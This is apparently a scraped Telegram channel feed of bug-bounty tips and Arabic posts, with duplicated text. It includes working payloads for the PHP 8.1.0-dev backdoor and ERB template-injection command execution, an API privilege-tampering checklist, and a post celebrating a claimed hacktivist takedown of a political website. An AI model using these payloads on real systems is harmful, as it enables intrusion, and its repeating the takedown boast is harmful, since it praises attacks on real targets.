سايبر رووت هي خدمة سيبرانية تقدم فحص شامل للثغرات، اختبار اختراق احترافي، تأمين البيانات وتحسين البنية الأمنية للمواقع
نساعد أصحاب المواقع والشركات الصغيرة على حماية منصاتهم من الهجمات و كل الثغرات من خلال تقارير مفصلة وحلول عملية
https://cyberroot.xo.je
نساعد أصحاب المواقع والشركات الصغيرة على حماية منصاتهم من الهجمات و كل الثغرات من خلال تقارير مفصلة وحلول عملية
https://cyberroot.xo.je
❤2
السلام عليكم
ان شاء الله رمضانكم مبارك
قررت ندير قناه تيلجرام ننشر فيها كل مايتعلق ب الامن السيبراني و الاختراق الاخلاقي للناس المهتمه بلمجال
ان شاء الله رمضانكم مبارك
قررت ندير قناه تيلجرام ننشر فيها كل مايتعلق ب الامن السيبراني و الاختراق الاخلاقي للناس المهتمه بلمجال
❤2
If you find PHP 8.1.0-dev then try RCE & SQLi
User-Agent: zerodiumsleep(5);
User-Agent: zerodiumsystem('id');
User-Agent: zerodiumsleep(5);
User-Agent: zerodiumsystem('id');
When testing APIs, always modify every parameter, even the ones that look irrelevant.
I’ve seen cases where changing a single hidden parameter like:
role=user → role=admin
type=basic → type=premium
user_id=123 → user_id=124
unexpectedly exposed data.
Developers often validate the main parameter but forget secondary ones.
Quick checklist when testing APIs:
• Modify every parameter
• Remove parameters entirely
• Send duplicate parameters
• Change data types (int → string)
• Test IDOR patterns
Sometimes the bug is hiding in the parameter nobody thought to check.
#BugBounty #CyberSecurity #AppSec #Infosec #SecurityResearch
I’ve seen cases where changing a single hidden parameter like:
role=user → role=admin
type=basic → type=premium
user_id=123 → user_id=124
unexpectedly exposed data.
Developers often validate the main parameter but forget secondary ones.
Quick checklist when testing APIs:
• Modify every parameter
• Remove parameters entirely
• Send duplicate parameters
• Change data types (int → string)
• Test IDOR patterns
Sometimes the bug is hiding in the parameter nobody thought to check.
#BugBounty #CyberSecurity #AppSec #Infosec #SecurityResearch
❤2
الآن هجوم سيبراني يطيح بالموقع الرسمي لدونالد ترامب، رئيس الولايات المتحدة الأمريكية.
الهجوم نفذه مجاهدي المقاومة الاسلامية السيبرانية في العراق "فريق 313" والموقع الآن خارج الخدمة.
https://donaldjtrump.com
#HackerNews
#Cyber_Islamic_Resistance
الهجوم نفذه مجاهدي المقاومة الاسلامية السيبرانية في العراق "فريق 313" والموقع الآن خارج الخدمة.
https://donaldjtrump.com
#HackerNews
#Cyber_Islamic_Resistance
🔥2
سايبر رووت هي خدمة سيبرانية تقدم فحص شامل للثغرات، اختبار اختراق احترافي، تأمين البيانات وتحسين البنية الأمنية للمواقع
نساعد أصحاب المواقع والشركات الصغيرة على حماية منصاتهم من الهجمات و كل الثغرات من خلال تقارير مفصلة وحلول عملية
https://cyberroot.xo.je
نساعد أصحاب المواقع والشركات الصغيرة على حماية منصاتهم من الهجمات و كل الثغرات من خلال تقارير مفصلة وحلول عملية
https://cyberroot.xo.je
Cyber root pinned «سايبر رووت هي خدمة سيبرانية تقدم فحص شامل للثغرات، اختبار اختراق احترافي، تأمين البيانات وتحسين البنية الأمنية للمواقع نساعد أصحاب المواقع والشركات الصغيرة على حماية منصاتهم من الهجمات و كل الثغرات من خلال تقارير مفصلة وحلول عملية https://cyberroot.xo.je»
Don't forget server-side template injection (SSTI)
RCE via SSTI
I was a testing SSTi And when i tested the payload: <%= 7*7 %>
Give me 49
It means he vuln be SSTI
So i test This payload: <%= system("id") %>
To run command ("id")
And it's worked
Look
A clear RCE via SSTi
RCE via SSTI
I was a testing SSTi And when i tested the payload: <%= 7*7 %>
Give me 49
It means he vuln be SSTI
So i test This payload: <%= system("id") %>
To run command ("id")
And it's worked
Look
A clear RCE via SSTi
❤2
